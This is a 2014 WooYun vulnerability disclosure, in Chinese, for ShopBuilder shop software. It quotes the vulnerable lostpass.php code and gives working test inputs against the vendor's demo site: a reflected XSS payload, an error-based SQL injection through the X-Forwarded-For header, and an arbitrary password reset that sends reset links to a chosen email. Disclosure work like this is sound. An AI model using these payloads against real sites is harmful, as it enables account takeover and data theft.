ShopBuilder商城云版、外贸版等几个漏洞【官网demo成功】

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-071087

漏洞标题：ShopBuilder商城云版、外贸版等几个漏洞【官网demo成功】

漏洞作者： magerx

提交时间：2014-08-05 17:52

修复时间：2014-11-03 17:54

公开时间：2014-11-03 17:54

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-08-05：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-11-03：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

rt.

详细说明：

厂商：
shopbuilder:www.shop-builder.cn
案例好像还挺多

漏洞文件lostpass.php,39行

if(!empty($_POST["action"])&&$_POST["action"]=="submit")
{
	$info=explode("|",$_POST["userid"]);
	$sql="select * from ".MEMBER." where userid='$info[0]'";
	$db->query($sql);
	$re=$db->fetchRow();
	if($re["userid"])
	{
		$md5=md5(time().rand(0,100));
		$md5='lock'.substr($md5,5,strlen($md5));
		$db->query("update ".MEMBER." SET password='$md5' where userid='$info[0]'");
		
		$mail_temp=get_mail_template('find_pwd');
		$con=$mail_temp['message'];
		$url=$config['weburl']."/lostpass.php?md5=$md5&userid=$re[userid]";
		$url="<a target='_blank' href='".$url."'>".$url."</a>";
		
		$ar1=array('[sitename]','[username]','[findurl]','[contact]');
		$ar2=array($config['company'],$re['user'],$url,$re['name']);
		$con=str_replace($ar1,$ar2,$con);
		send_mail($info[1],$re["user"],$config['company']." PASSWORD",$con);
		$tpl->assign("email",$info[1]);
	}

这个地方存在反射xss，测试方法

post: http://democn.shop-builder.cn/lostpass.php
action=xx&action=submit&userid=23|23289**[email protected]%c0'<iframe/onload=alert(1)>

还存在sql注入,测试方法：

POST /lostpass.php HTTP/1.1
Host: democn.shop-builder.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=afb08a195a17072dfae5fdd352f75725
X-Forwarded-For: 8.8.8.8',UpdateXML(1,CONCAT(0x5b,mid((SELECT user()),1,32),0x5d),1),'','')#
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
userid=23|23289**[email protected]&action=submit

返回内容：

insert into shopbuilder_page_view
		(url,ip,time,username,fileName)
		values
		('%2Flostpass.php','8.8.8.8',UpdateXML(1,CONCAT(0x5b,mid((SELECT user()),1,32),0x5d),1),'','')#','2014-08-05 17:48:48','','/lostpass.php')XPATH syntax error: '[root@localhost]'

X-Forwarded-For存在sql注入，获取了用户名
程序员的逻辑真是越来越看不懂了，只要post的action，submit不为空，就可以将指定userid的重置密码连接以邮件形式发送到指定邮箱，导致任意用户密码重置
下面用他的demo测试下

漏洞证明：

http://democn.shop-builder.cn/lostpass.php

post:

action=xx&action=submit&userid=23|23289**[email protected]

这里只要修改userid就可以重置任意用户的密码了，重置连接会发送到23289**[email protected]

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-071087

漏洞标题：ShopBuilder商城云版、外贸版等几个漏洞【官网demo成功】

相关厂商：ShopBuilder商城

漏洞作者： magerx

提交时间：2014-08-05 17:52

修复时间：2014-11-03 17:54

公开时间：2014-11-03 17:54

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 magerx@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-071087

漏洞标题：ShopBuilder商城云版、外贸版等几个漏洞【官网demo成功】

相关厂商：ShopBuilder商城

漏洞作者： magerx

提交时间：2014-08-05 17:52

修复时间：2014-11-03 17:54

公开时间：2014-11-03 17:54

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-071087"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 magerx@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：